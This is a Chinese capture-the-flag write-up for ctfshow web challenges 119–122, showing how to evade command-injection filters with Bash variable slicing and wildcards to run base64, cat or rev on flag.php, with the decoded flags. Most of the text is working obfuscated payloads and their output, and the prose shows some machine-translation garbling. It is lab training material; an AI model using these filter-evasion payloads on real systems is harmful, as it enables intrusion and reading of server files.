ctfshow-web入门-下令实行（web119、web120、web121、web122）

目录

1、web119
2、web120
3、web121
4、web122

---

1、web119

采用 118 的 payload，回显 evil input，说明新增了过滤

单独测试一下，是 PATH 、BASH 被过滤了
在上一题的底子上，我们再介绍一个内置变量：$RANDOM
它会天生一个随机数，长度一般是 4 位或者 5 位，也就是说我们可以得到 4 或者 5 。

那么我们就可以构造出 /bin/base64 去读取 flag.php，主要就是构造出 / 和 4，其他使用通配符。
构造 /bin/base64 flag.php，payload：

1. ${PWD::${#SHLVL}}???${PWD::${#SHLVL}}?????${#RANDOM} ????.???

复制代码

此中 ${PWD:{#SHLVL}} 就等同于斜杠 /，${#RANDOM} 的值大概是 4 或者 5 ，所以大概需要多试几次。

得到：

1. PD9waHAKJGZsYWc9ImN0ZnNob3d7MTViYzM3NTItMjYxNC00YmY4LWI1ZDYtZjQ4YmYwZTA4NjNk fSI7Cj8+
2. fSI7Cj8+

复制代码

进行 base64 解码：

拿到 flag：ctfshow{15bc3752-2614-4bf8-b5d6-f48bf0e0863d}

   其他尝试
  固然我们还可以构造其他的，我们知道 cat 也是在 bin 目录下的，尝试构造 /bin/cat flag.php
这里当前登录的用户名应该是 www-data，我最开构造的是 a ，取变量的末了一个字母，也就是 /bin/?a?

1. ${PWD::${#SHLVL}}???${PWD::${#SHLVL}}?${USER:~Q}? ????.???

复制代码

下令实行乐成了，可惜实行的不是 cat 下令：
（也大概不是实行成了其他下令，也大概是读到了其他的文件，并未匹配到 flag.php）

我们可以来看一下 Linux 系统的 bin 目录下符合要求的下令：
可以看到还是许多的，因此并不肯定会实行到我们期望的那个下令

 这里我们构造 t ，也就是 /bin/??t，题目提示内里说：

1. ${HOME:${#HOSTNAME}:${#SHLVL}}     ====>   t

复制代码

构造 payload： 

1. ${PWD::${#SHLVL}}???${PWD::${#SHLVL}}??${HOME:${#HOSTNAME}:${#SHLVL}} ????.???

复制代码

 cat 下令实行乐成，拿到 flag 

$HOME 应该是 /var/www/html，但是其实我也并不清楚 ${HOSTNAME} 是什么以及它的长度是多少；假设 ${HOSTNAME} 也是 www-data，那么它和 $USER 长度就是一样的，将 payload 中的 HOSTNAME 替换成 USER，但是发现打不通：

1. ${PWD::${#SHLVL}}???${PWD::${#SHLVL}}??${HOME:${#USER}:${#SHLVL}} ????.???

复制代码

说明它两内容长度不一样，这里乐成取到 t ，说明 ${#HOSTNAME} 是 10。

此外，我们是否还可以继承构造 nl 下令呢？
我在我本身服务器上发现 $LANG 中存在 n

构造 n：

1. ${LANG:${#SHLVL}:${#SHLVL}}

复制代码

构造 nl flag.php 

1. ${LANG:${#SHLVL}:${#SHLVL}}${PWD:~Q} ????.???

复制代码

可惜也没有买通，具体的题目情况和我本身服务器的不一样。
其实还有其他包含 n 的，这里的话我们就需要构造数字 3 
 

但是 3 这个数字欠好构造，我们可以倒着来取，还记得上一题时我们说到的波浪号吗？
我们倒着取索引为 5 的便是 n，构造字符 n：

1. ${SHELL:~${#RANDOM}:${#SHLVL}}

复制代码

我们说了这个随机数长度大概是 4 也大概是 5 ，因此也需要多试几次： 

构造 nl flag.php，payload：

1. ${SHELL:~${#RANDOM}:${#SHLVL}}${PWD:~Q} ????.???

复制代码

可惜还是不行，一般来说 shell 和 bash 都是 /bin/bash

于是我回到了上一题，没有过滤 BASH 的题去实行，发现无论是 BASH 还是 SHELL 都不行。
不知道题目出在那里还是说它确实没有这个或者内容不一样（有知道的师傅可以告知一下谢谢）

2、web120

直接给了源码，新增过滤 HOME

base64 的 payload 可以继承使用：（多试几次）

1. code=${PWD::${#SHLVL}}???${PWD::${#SHLVL}}?????${#RANDOM} ????.???

复制代码

得到：

1. PD9waHAKJGZsYWc9ImN0ZnNob3d7YjU0NTdhMjYtYzgwMy00NDVkLWFhYTEtM2M5MTZjYjZjNTE5 fSI7Cj8+
2. fSI7Cj8+

复制代码

base64 解码：

拿到 flag：ctfshow{b5457a26-c803-445d-aaa1-3c916cb6c519} 
看了提示给的 payload：

1. ${PWD::${#SHLVL}}???${PWD::${#SHLVL}}?${USER:~A}? ????.???

复制代码

好家伙，就是前面上一题我没有试乐成的，读出来也是乱码，我还以为是实行成了其他下令呢。
也大概不是实行成了其他下令，也大概是读到了其他的文件，并未匹配到 flag.php。

我也搜索过 flag ，但是没找到什么有用信息：

3、web121

也是给了源码，但是过滤东西更多了

SHLVL 被过滤掉，我们使用 ${##} 或者 ${#?} 取代：

还是采用 base64 的 payload，修改一下 payload：

1. code=${PWD::${#?}}???${PWD::${#?}}?????${#RANDOM} ????.???

复制代码

1. PD9waHAKJGZsYWc9ImN0ZnNob3d7MDBhNzA4YmYtMWMzZi00N2M3LTllYTUtNGM5ZGVkNWU3Mzk1 fSI7Cj8+
2. fSI7Cj8+

复制代码

解码：

拿到 flag：ctfshow{00a708bf-1c3f-47c7-9ea5-4c9ded5e7395}
此外还可以构造 rev 下令：
${#IFS} 是 3 

payload：

1. code=${PWD::${#?}}???${PWD::${#?}}${PWD:${#IFS}:${#?}}?? ????.???

复制代码

因为 $PWD 是 /var/www/html，从索引为 3 的开始取 1 位就是 r，结果取倒序即可。

这里出现了 3，放到前面的题去试了下，BASH 和 SHELL 的依旧是不行，岂非都不是 /bin/bash吗，很奇怪。

4、web122

# 也被过滤了，很难去得到长度和数字
题目提示：

1. 通过$?来实现的，$?是表示上一条命令执行结束后的传回值。通常0代表执行成功，非0代表执行有误

复制代码

但是我在本地测试它实行失败并不是返回 1，只是一个非 0 的数。
提示给的 payload：

1. code=<A;${HOME::$?}???${HOME::$?}?????${RANDOM::$?} ????.???

复制代码

它这里用到的是 /bin/base64 去读取 flag 的，此中 $? 被表明成了 1，因此 ${HOME:?} 对应的就是斜杠 /，后面使用随机数变量随机天生了一个 4 至 5 位数，然后取随机数的第一位，当随机数的第一位为 4 即可匹配到 base64，不外前面的 <A 是什么我并不理解，去掉是不行的，等待大佬表明下谢谢。

解码拿到 flag：ctfshow{3d1c6ce9-7bcf-4e96-a263-1172c8a79152}

关于使用 Linux 内置变量与 Bash 切片的下令实行至此结束。

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。